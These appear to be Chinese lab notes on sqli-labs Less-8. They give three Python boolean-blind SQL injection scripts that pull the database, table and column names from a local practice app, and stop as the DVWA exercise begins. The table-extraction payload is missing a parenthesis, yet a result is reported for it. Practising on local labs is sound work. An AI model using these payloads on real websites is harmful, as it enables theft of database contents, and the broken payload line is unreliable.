1.完成sql注入的python脚本编写
2.完成dvwas中sql注入模块的练习
使用python来进项对sql-labs第八关进行python自动化的注入
sql注入的语句:
database()
select group_concat(table_name) from information_schema.tables where table_schema='security'
select group_concat(column_name) from information_schema.columnS where TABLE_SCHEMA='security' and table_name='users'
python注入的脚本
先把库注入出来:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2022/1/5 0:15
# @Author : 李振辉
# @File : web.py
import requests
url='http://127.0.0.1/sql/Less-8/?id=1'
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62"
}
resp=requests.get(url,headers=headers)
get_length_payload="' and length(database())={}--+"
for x in range(1,50):
exec_url=url+get_length_payload.format(x)
respon=requests.get(exec_url,headers=headers)
if(resp.text==respon.text):
print("该数据长度为{}".format(x))
break
chars="abcdefghijklmnopqrstuvwzxyABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!@#$%^&*()_+,?."
get_data_payload="' and ascii(substr(database(),{},1))='{}' --+"
result_data=""
for i in range(1,x+1):
for char in chars:
exec_url=url+get_data_payload.format(i,ord(char))
payload_response=requests.get(exec_url,headers=headers)
if payload_response.text==resp.text:
result_data=result_data+char
break
print("该数据是{}".format(result_data))
测试结果:
该数据长度为8
该数据是security
再把表注入出来
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2022/1/5 0:15
# @Author : 李振辉
# @File : web.py
import requests
url='http://127.0.0.1/sql/Less-8/?id=1'
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62"
}
resp=requests.get(url,headers=headers)
get_length_payload="' and length((select group_concat(table_name) from information_schema.tables where table_schema='security'))={}--+"
for x in range(1,50):
exec_url=url+get_length_payload.format(x)
respon=requests.get(exec_url,headers=headers)
if(resp.text==respon.text):
print("该数据长度为{}".format(x))
break
chars="abcdefghijklmnopqrstuvwzxyABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!@#$%^&*()_+,?."
get_data_payload="' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='security',{},1))='{}' --+"
result_data=""
for i in range(1,x+1):
for char in chars:
exec_url=url+get_data_payload.format(i,ord(char))
payload_response=requests.get(exec_url,headers=headers)
if payload_response.text==resp.text:
result_data=result_data+char
break
print("该数据是{}".format(result_data))
测试结果:
该数据长度为29
该数据是emails,referers,uagents,users
注入列
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2022/1/5 0:15
# @Author : 李振辉
# @File : web.py
import requests
url='http://127.0.0.1/sql/Less-8/?id=1'
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62"
}
resp=requests.get(url,headers=headers)
get_length_payload="' and length((select group_concat(column_name) from information_schema.columnS where TABLE_SCHEMA='security' and table_name='users'))={}--+"
for x in range(1,50):
exec_url=url+get_length_payload.format(x)
respon=requests.get(exec_url,headers=headers)
if(resp.text==respon.text):
print("该数据长度为{}".format(x))
break
chars="abcdefghijklmnopqrstuvwzxyABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!@#$%^&*()_+,?."
get_data_payload="' and ascii(substr((select group_concat(column_name) from information_schema.columnS where TABLE_SCHEMA='security' and table_name='users'),{},1))='{}' --+"
result_data=""
for i in range(1,x+1):
for char in chars:
exec_url=url+get_data_payload.format(i,ord(char))
payload_response=requests.get(exec_url,headers=headers)
if payload_response.text==resp.text:
result_data=result_data+char
break
print("该数据是{}".format(result_data))
测试结果
该数据长度为20
该数据是ID,username,password
dvmas 的sql注入的练习
low: